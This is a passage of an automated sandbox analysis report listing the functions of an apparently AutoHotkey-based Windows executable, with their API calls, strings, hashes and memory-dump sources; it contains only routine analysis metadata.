Opcode Fuzzy Hash: 429d3398c94996722cb4c202dcb071b3be08e049a3cc93c5ecfde10a2eaccd18
Instruction Fuzzy Hash: E79002692511005A9A4017746D896156AD09A5A6127E18861A401C4455DAA45100661A

Uniqueness

Uniqueness Score: -1.00%

Function 00444210, Relevance: 95.4, APIs: 50, Strings: 4, Instructions: 939registrywindowCOMMON

Download Yara Rule

APIs

RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00444231
DefWindowProcW.USER32(?,?,?,?), ref: 004449BE

Strings

9000, xrefs: 00444935
TaskbarCreated, xrefs: 0044422C
localhost, xrefs: 0044491E
AHK_ATTACH_DEBUGGER, xrefs: 004448ED

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: Window$MessageProcRegister
String ID: 9000$AHK_ATTACH_DEBUGGER$TaskbarCreated$localhost
API String ID: 136062168-182697789
Opcode ID: cbf6467e7d4941eb827b6e3c37d2da906d66c62ec6271e852f0de29c807b002d
Instruction ID: 80bc7f5fa79d313f4b074f99b2c784596d3a7a302932d87829c9610e021cc9f2
Opcode Fuzzy Hash: cbf6467e7d4941eb827b6e3c37d2da906d66c62ec6271e852f0de29c807b002d
Instruction Fuzzy Hash: 2062CE726042049BE720DF69EC85B6BB7A8EBC5361F00462BF945D7791D739EC00CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041D7F0, Relevance: 56.2, APIs: 22, Strings: 10, Instructions: 240
registrywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0041D81C

Part of subcall function 00480460: LoadLibraryExW.KERNEL32(?,00000000,00000002,004D6340,004D8728,?,004D8728,00000000,FFFFFF61,00000000,00000000,00000000,004D6340,745FA180,004D8728), ref: 00480479
Part of subcall function 00480460: FindResourceW.KERNEL32(?,?,0000000E), ref: 004804DF
Part of subcall function 00480460: LoadResource.KERNEL32(?,00000000), ref: 004804EF
Part of subcall function 00480460: LockResource.KERNEL32(00000000), ref: 004804FE
Part of subcall function 00480460: GetSystemMetrics.USER32 ref: 00480526
Part of subcall function 00480460: FindResourceW.KERNEL32(?,?,00000003), ref: 00480586
Part of subcall function 00480460: LoadResource.KERNEL32(?,00000000), ref: 00480594
Part of subcall function 00480460: LockResource.KERNEL32(00000000), ref: 0048059F

GetSystemMetrics.USER32 ref: 0041D866

Part of subcall function 00480460: EnumResourceNamesW.KERNEL32 ref: 004804C6
Part of subcall function 00480460: SizeofResource.KERNEL32(?,00000000,00000001,00030000,00000000,00000000,00000000), ref: 004805BA
Part of subcall function 00480460: CreateIconFromResourceEx.USER32 ref: 004805C2
Part of subcall function 00480460: ExtractIconW.SHELL32(00000000,?,?), ref: 00480602

LoadCursorW.USER32(00000000,00007F00), ref: 0041D896
RegisterClassExW.USER32 ref: 0041D8BB
RegisterClassExW.USER32 ref: 0041D901
GetForegroundWindow.USER32 ref: 0041D908
GetClassNameW.USER32 ref: 0041D91A
__wcsicoll.LIBCMT ref: 0041D92E
CreateWindowExW.USER32 ref: 0041D985
CreateWindowExW.USER32 ref: 0041D9DC
GetDC.USER32(00000000), ref: 0041D9E8
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041DA21
MulDiv.KERNEL32(0000000A,00000000), ref: 0041DA2A
CreateFontW.GDI32(00000000), ref: 0041DA33
ReleaseDC.USER32 ref: 0041DA46
SendMessageW.USER32(?,00000030,?,00000000), ref: 0041DA63
SendMessageW.USER32(?,000000C5,00000000,00000000), ref: 0041DA75
ShowWindow.USER32(?,00000000), ref: 0041DA85
ShowWindow.USER32(?,00000000), ref: 0041DA90
ShowWindow.USER32(?,00000006), ref: 0041DA9F
SetWindowLongW.USER32(?,000000EC,00000000), ref: 0041DAAB
LoadAcceleratorsW.USER32 ref: 0041DABD

Part of subcall function 0041DBC0: _memset.LIBCMT ref: 0041DBD0
Part of subcall function 0041DBC0: _wcsncpy.LIBCMT ref: 0041DC42
Part of subcall function 0041DBC0: Shell_NotifyIconW.SHELL32(00000000,004D89A2), ref: 0041DC55

Strings

Consolas, xrefs: 0041D9F7
CreateWindow, xrefs: 0041D9A1
Lucida Console, xrefs: 0041D9FE, 0041DA03
0, xrefs: 0041D837
pJ, xrefs: 0041D83F
AutoHotkey, xrefs: 0041D97A
edit, xrefs: 0041D9D5
Shell_TrayWnd, xrefs: 0041D928
RegClass, xrefs: 0041D8D3
AutoHotkey2, xrefs: 0041D8F1

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: Resource$Window$Load$Create$ClassIconShow$FindLockMessageMetricsRegisterSendSystem_memset$AcceleratorsCapsCursorDeviceEnumExtractFontForegroundFromLibraryLongNameNamesNotifyReleaseShell_Sizeof__wcsicoll_wcsncpy
String ID: 0$AutoHotkey$AutoHotkey2$Consolas$CreateWindow$Lucida Console$RegClass$Shell_TrayWnd$edit$pJ
API String ID: 2294752942-4024917522
Opcode ID: ce84e8b25d97995134bb79443dbd13fb4a0b71e8fe13267b38cb9f88f0b43b5d
Instruction ID: 264ce056df1253c2735db1ca3bcace7c5d3b5ca8ae76d018524b05eae3189702
Opcode Fuzzy Hash: ce84e8b25d97995134bb79443dbd13fb4a0b71e8fe13267b38cb9f88f0b43b5d
Instruction Fuzzy Hash: F071E8B1B843007BE760EB68DC46F5777A8AB45B14F10452BF600A72D0E7B9E444CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00450890, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 181
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(user32,?,?,?,00000000), ref: 004508B7
GetModuleHandleW.KERNEL32(kernel32,?,00000000), ref: 004508C3
GetModuleHandleW.KERNEL32(comctl32,?,00000000), ref: 004508CF
GetModuleHandleW.KERNEL32(gdi32,?,00000000), ref: 004508DB
_wcsncpy.LIBCMT ref: 004508F7
_wcsrchr.LIBCMT ref: 00450913
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,00000000), ref: 00450940
GetProcAddress.KERNEL32(00000000,?), ref: 00450960
GetProcAddress.KERNEL32(?,?), ref: 004509AF
WideCharToMultiByte.KERNEL32(00000000,00000000,-00000002,000000FF,?,00000104,00000000,00000000,?,?,?,?,00000000), ref: 004509DD
GetModuleHandleW.KERNEL32(?,?,?,?,?,00000000), ref: 004509EB
LoadLibraryW.KERNEL32(?,?,?,?,?,00000000), ref: 00450A06
GetProcAddress.KERNEL32(00000000,?), ref: 00450A3F
GetProcAddress.KERNEL32(00000000,?), ref: 00450A68

Strings

DllCall, xrefs: 00450A14, 00450AB6
comctl32, xrefs: 004508C5
kernel32, xrefs: 004508B9
user32, xrefs: 004508B2
gdi32, xrefs: 004508D1

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: HandleModule$AddressProc$ByteCharMultiWide$LibraryLoad_wcsncpy_wcsrchr
String ID: DllCall$comctl32$gdi32$kernel32$user32
API String ID: 1361463379-1793033601
Opcode ID: 3a21b2b3473bef759d03f8312c8048fa85da8ffeacfff46b815c661ed1a09ac3
Instruction ID: 40a73594808942e6a3432fe0ad0c324e51847c379f8fe4d0271ff3bdb5c5a4f2
Opcode Fuzzy Hash: 3a21b2b3473bef759d03f8312c8048fa85da8ffeacfff46b815c661ed1a09ac3
Instruction Fuzzy Hash: 1E5127B660530167D7309B699C85BABB395EFE4720F05052FE84493292EBB9DC09C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00480460, Relevance: 21.2, APIs: 14, Instructions: 174
windowlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000002,004D6340,004D8728,?,004D8728,00000000,FFFFFF61,00000000,00000000,00000000,004D6340,745FA180,004D8728), ref: 00480479
EnumResourceNamesW.KERNEL32 ref: 004804C6
FindResourceW.KERNEL32(?,?,0000000E), ref: 004804DF
LoadResource.KERNEL32(?,00000000), ref: 004804EF
LockResource.KERNEL32(00000000), ref: 004804FE
GetSystemMetrics.USER32 ref: 00480526
FindResourceW.KERNEL32(?,?,00000003), ref: 00480586
LoadResource.KERNEL32(?,00000000), ref: 00480594
LockResource.KERNEL32(00000000), ref: 0048059F
SizeofResource.KERNEL32(?,00000000,00000001,00030000,00000000,00000000,00000000), ref: 004805BA
CreateIconFromResourceEx.USER32 ref: 004805C2
FreeLibrary.KERNEL32(?), ref: 004805ED
ExtractIconW.SHELL32(00000000,?,?), ref: 00480602
ExtractIconW.SHELL32(00000000,?,-00000001), ref: 0048061F

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: Resource$IconLoad$ExtractFindLibraryLock$CreateEnumFreeFromMetricsNamesSizeofSystem
String ID:
API String ID: 2349713634-0
Opcode ID: 53b4fa39ca7a2450f13793fb86ad05d142804e08cb44d8201b7d4749c5e222bb
Instruction ID: bc99d525df9cf83f70915a52a5508ce3b076cfa0c6c6c411cdc66c836bfb7cdf
Opcode Fuzzy Hash: 53b4fa39ca7a2450f13793fb86ad05d142804e08cb44d8201b7d4749c5e222bb
Instruction Fuzzy Hash: A051F6726553156BD3A0AB68DC44B2FBBD8EB85B21F450D2BFC45D2240D778D8048FB9

Uniqueness

Uniqueness Score: -1.00%

Function 0041DD70, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 177
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 0041DD83

Part of subcall function 0049853E: __FF_MSGBANNER.LIBCMT ref: 00498557
Part of subcall function 0049853E: __NMSG_WRITE.LIBCMT ref: 0049855E
Part of subcall function 0049853E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0049E811,004011D4,00000001,004011D4,?,0049D07D,00000018,004CE9B0,0000000C,0049D10D), ref: 00498583

SetTimer.USER32(?,0000000E,04EF6D80,00403D70), ref: 0041DDCA
_free.LIBCMT ref: 0041DEFC

Strings

@cM, xrefs: 0041DF85
0RK, xrefs: 0041DE82

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: AllocateHeapTimer_free_malloc
String ID: 0RK$@cM
API String ID: 92111083-1109199464
Opcode ID: 57b6167fb47c55bcf07d2400bd7d4e383054995af9d1d2d3d3aa9d68d3954b93
Instruction ID: f619462d7b8e9393d2fc4c5bc8fa687bd652c330b6997c9d95e2a4fc7c153b29
Opcode Fuzzy Hash: 57b6167fb47c55bcf07d2400bd7d4e383054995af9d1d2d3d3aa9d68d3954b93
Instruction Fuzzy Hash: DB719FB0A062409FD710EF2AEC84EA17BE5FB19314F5544BFE1088B3A2D7759880CF19

Uniqueness

Uniqueness Score: -1.00%

Function 00462588, Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004625C2
_malloc.LIBCMT ref: 00462904

Part of subcall function 0049853E: __FF_MSGBANNER.LIBCMT ref: 00498557
Part of subcall function 0049853E: __NMSG_WRITE.LIBCMT ref: 0049855E
Part of subcall function 0049853E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0049E811,004011D4,00000001,004011D4,?,0049D07D,00000018,004CE9B0,0000000C,0049D10D), ref: 00498583

_free.LIBCMT ref: 0046416D

Strings

Out of memory., xrefs: 00463E09, 00463E49
0OM, xrefs: 004625F3

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: AllocateHeap_free_malloc_memmove
String ID: 0OM$Out of memory.
API String ID: 1897403436-2291366520
Opcode ID: f158921d6b894d912a0ba39e79de021076c21df51637a5b7c75d01924fc71ed5
Instruction ID: 299268eba9b4be4500727cb9dcc5e67cda590393f95210361e0d49fbcd938116
Opcode Fuzzy Hash: f158921d6b894d912a0ba39e79de021076c21df51637a5b7c75d01924fc71ed5
Instruction Fuzzy Hash: 1722DDB1A00604DBDF24DF54C880BAEB7B1EF45304F28855BE8059B391E778ED42CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00464A4A, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 97
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 00464A67
_malloc.LIBCMT ref: 00464A81
_free.LIBCMT ref: 00464D20
SetTimer.USER32(?,0000000D,00002710,00446060), ref: 00464D6C

Strings

h``D, xrefs: 00464D5F
Out of memory., xrefs: 00464A98

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: _free$Timer_malloc
String ID: Out of memory.$h``D
API String ID: 2288515124-613375919
Opcode ID: fd93642b9f5ee9ef2be77b2104c64305ea3134ffa096cbfc8b60c1dfc5e690ca
Instruction ID: d2d01a10188a9c9c736f2e512733dec2cd2f1e35d73da9b0cbf1fa1230d8202f
Opcode Fuzzy Hash: fd93642b9f5ee9ef2be77b2104c64305ea3134ffa096cbfc8b60c1dfc5e690ca
Instruction Fuzzy Hash: AB31AD70A062019BDB10CF29AC40B7A77E0E799328F14457FE85587391FB79C949CB4E

Uniqueness

Uniqueness Score: -1.00%

Function 0041E64F, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNEL32 ref: 0041E650

Part of subcall function 0047E600: _vswprintf_s.LIBCMT ref: 0047E619

Strings

Script file not found:%s, xrefs: 0041E662
ErrorLevel, xrefs: 0041E8A2

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: AttributesFile_vswprintf_s
String ID: ErrorLevel$Script file not found:%s
API String ID: 2221781580-1401792684
Opcode ID: 95949500456dcde1863ec8af0ae1bd5f72b758ca83441423b89b56888da227f0
Instruction ID: 17eacbc4c798b68f3ccbe7151ca9d1788537f2652edd5c991613c87dfffd12a4
Opcode Fuzzy Hash: 95949500456dcde1863ec8af0ae1bd5f72b758ca83441423b89b56888da227f0
Instruction Fuzzy Hash: 5681C374700201AFD714EF26DC80BAAB3A4FB44314F54852FFA189B381D779E881CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041CE80, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 133
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0041D0C8
OleInitialize.OLE32(00000000), ref: 0041D112

Strings

Tray, xrefs: 0041D0D5
No tray mem, xrefs: 0041D0EF

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: Initialize_memset
String ID: No tray mem$Tray
API String ID: 2068092829-3325046031
Opcode ID: d30275ddd45ddc678910805658417022c5511b299a8dcebe61cda2d2fb3fe29f
Instruction ID: ecdc4eb4f24e8d24a009d128a44545988317ec5bd39d2dc00344e6fa554e5346
Opcode Fuzzy Hash: d30275ddd45ddc678910805658417022c5511b299a8dcebe61cda2d2fb3fe29f
Instruction Fuzzy Hash: 01617CB0947352AEE750DF1AADD9669BBA4F75A300BA04ABFD058C33A0CB740840CF4D

Uniqueness

Uniqueness Score: -1.00%

Function 00464B68, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 00464D20
SetTimer.USER32(?,0000000D,00002710,00446060), ref: 00464D6C

Strings

h``D, xrefs: 00464D5F

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: Timer_free
String ID: h``D
API String ID: 2702591383-2202871294
Opcode ID: 723c9a4659db45550a25717350e66d95d0f8cea6e6a26e57b3616cd315a871fd
Instruction ID: 52d3389e46c825ec04a9a31fe2160eb2d552a69d2c1afacda6c270c3f40660f0
Opcode Fuzzy Hash: 723c9a4659db45550a25717350e66d95d0f8cea6e6a26e57b3616cd315a871fd
Instruction Fuzzy Hash: 32216B71A093009FD710DF25E884BABB7E5BBD8728F04896FF88597250E738D944CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00404090, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNEL32(?,00000000,0J,00000000,004AABF8,000000FF,0041ED55), ref: 004040FA
_free.LIBCMT ref: 00404115

Strings

0J, xrefs: 004040A5

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: ChangeCloseFindNotification_free
String ID: 0J
API String ID: 2993663561-3766476707
Opcode ID: 1f79ed1d841f3a68e0f6ab9c01960da3ba8ab970fa90f51354fbbf3bcca2d6b4
Instruction ID: 3aa64f7a465c7e406b653edfbf6c143d1183e9a7a514ea076d1f4fcc2d3eaedc
Opcode Fuzzy Hash: 1f79ed1d841f3a68e0f6ab9c01960da3ba8ab970fa90f51354fbbf3bcca2d6b4
Instruction Fuzzy Hash: 84118BB1500B519BD720CF18C948B17B7E4FB49720F548A2EE0A697BD0C378B8408B49

Uniqueness

Uniqueness Score: -1.00%

Function 0047CA40, Relevance: 4.6, APIs: 3, Instructions: 118
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(FFFFFFF6), ref: 0047CB01
CreateFileW.KERNEL32(?,?,?,00000000,?,?,00000000), ref: 0047CB44
GetFileType.KERNEL32(?), ref: 0047CB61

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: File$CreateHandleType
String ID:
API String ID: 1789326604-0
Opcode ID: ed6ae78ca36ea3c8df2a820f793ac34d682e6323d807b20fc85567a8f6edf9a0
Instruction ID: 1ce4c8447a2fa701c5eaf1e142c0c10c2ed1db63bb50a4815ed777b0af8ca97a
Opcode Fuzzy Hash: ed6ae78ca36ea3c8df2a820f793ac34d682e6323d807b20fc85567a8f6edf9a0
Instruction Fuzzy Hash: 8231CE726042054BD720CE28E8C57ABB7A8EB95721F24C21FF55ACB3D0C738A881C769

Uniqueness

Uniqueness Score: -1.00%

Function 004A2C60, Relevance: 4.5, APIs: 3, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32(00000000,0049B742), ref: 004A2C63
__malloc_crt.LIBCMT ref: 004A2C92
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004A2C9F

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: 16fc829771e9435415495522644ed0f5c13f5dead223c5d0926e6ba8cbaf8f4f
Instruction ID: 9f84be175a4a2392ffb28c5ed453ecb735ebba0e1b61e45517c9dfc6cf72f7c0
Opcode Fuzzy Hash: 16fc829771e9435415495522644ed0f5c13f5dead223c5d0926e6ba8cbaf8f4f
Instruction Fuzzy Hash: 2EF027775000106A8F34B77DBE4999F2729DAF337530A882BF802C3300F6A88D41A3A9

Uniqueness

Uniqueness Score: -1.00%

Function 0044ACB0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,?,0042A9D0), ref: 0044ACE6

Strings

:, xrefs: 0044ACD4

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 4e4e90640c43fc116cdf5c469440afbb0592297fe6da4095e75ffdbf127e6faa
Instruction ID: 90f519f8a0a8c456d684136568f3ca2365b621ba2a360c8d17d40947c2faf077
Opcode Fuzzy Hash: 4e4e90640c43fc116cdf5c469440afbb0592297fe6da4095e75ffdbf127e6faa
Instruction Fuzzy Hash: D2112775B4430036F731E714AC82BAB37A1AF85B18F54856FF554562E0D6BC5885C34F

Uniqueness

Uniqueness Score: -1.00%

Function 00405403, Relevance: 3.0, APIs: 2, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00405408
_malloc.LIBCMT ref: 00405427

Part of subcall function 0049853E: __FF_MSGBANNER.LIBCMT ref: 00498557
Part of subcall function 0049853E: __NMSG_WRITE.LIBCMT ref: 0049855E
Part of subcall function 0049853E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0049E811,004011D4,00000001,004011D4,?,0049D07D,00000018,004CE9B0,0000000C,0049D10D), ref: 00498583

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
